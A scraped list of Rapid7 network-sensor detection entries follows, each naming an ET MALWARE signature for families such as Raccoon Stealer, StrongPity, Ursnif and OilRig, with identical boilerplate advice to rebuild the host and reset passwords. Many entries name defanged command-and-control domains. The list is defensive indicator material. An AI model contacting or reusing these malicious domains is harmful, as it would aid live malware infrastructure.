Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (pulmonyarea .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (resolutionplatform .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity CnC Domain (uppertrainingtool .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity Domain (autoconfirmations .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity Domain (lurkingnet .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed StrongPity Domain (singlefunctionapp .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed TA471/UNC2589 Go Downloader User-Agent (-hobot-)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (blog .br0vvnn .io)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (codevexillium .org)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (krakenfolio .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (transferwiser .io)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious Domain in TLS SNI (transplugin .io)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Targeted Attack Malicious SSL Cert (angeldonationblog .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Targeted Attack Malicious SSL Cert (investbooking .de)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Targeted Attack Malicious SSL Cert (opsonew3org .sg)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed TaurusStealer CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Thanatos Ransomware Variant Pico User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed TrumpHead Ransomware CnC Domain (6bbsjnrzv2uvp7bp .onion .pet in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Turla/APT34 CnC Domain Domain (dubaiexpo2020 .cf in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Turla Domain (vision2030 .tk in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Unk.PowerShell Loader CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Upatre CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Ursnif CnC Domain (Gloderuniok .website in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed Ursnif CnC Domain (Vloderuniok .website in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed Ursnif Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Ursnif Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed VikroStealer CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed VikroStealer CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/CollectorStealer User-Agent M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/CollectorStealer User-Agent M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/DecryptStealer Exfil Domain (geroipanel .site in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (annafraudy .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (attentionmagnet .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (belochkaneprihoditodna .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (birdmilk .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (blogsolutions .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (footballstar .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (genericalphabet .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (gimmegimmejimmy .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (gopstoporchestra .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (lomhasnopryiyome .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (mindbreaker .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (msresearchcenter .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (newageiscoming .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (number1g .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (number2g .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (realonlinetrend .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (stanculinaryblog .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (stockme .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (tapewormorchestra .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (whatsthescore .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer CnC Domain (youareperfect2day .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer Domain (cheapfacechange .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32.Raccoon Stealer Domain (hellowoodie .top in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/Wacapew.A!ml Domain in TLS SNI (zytrox .tk)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed ZLoader CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed ZLoader CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE OceanLotus System Profiling JavaScript HTTP Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware CnC Server Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware CnC Server Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Octopus Malware Initial Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Office Macro Emotet Download URI Nov 24 2021

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Oficla Checkin (1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Oficla Downloader Activity Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig APT PowDesk Powershell Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig OopsIE CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig OopsIE CnC Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig OopsIE CnC Checkin M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OilRig QUADAGENT CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Oilrig Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OLDBAIT Checkin 2 brvc

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OLDBAIT Checkin sptr

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OneLouder Common URI Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Onkods.A Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Baby Coin syschk CnC Communication

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Blockbuster User-Agent (Mozillar)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Buhtrap CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Operation Cobra Venom WSF Stage 1 - CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Cobra Venom WSF Stage 1 - File Decode Completed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Cobra Venom WSF Stage 2 - CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation EvilTraffic Initial Redirect M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation EvilTraffic Initial Redirect M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation Interception Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Operation Mystery Baby syschk CnC Communication

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Operation SpoofedScholars Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Optix Pro Trojan/Keylogger Reporting Installation via HTTP-Email Post

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Orca RAT URI Struct 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OS X Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

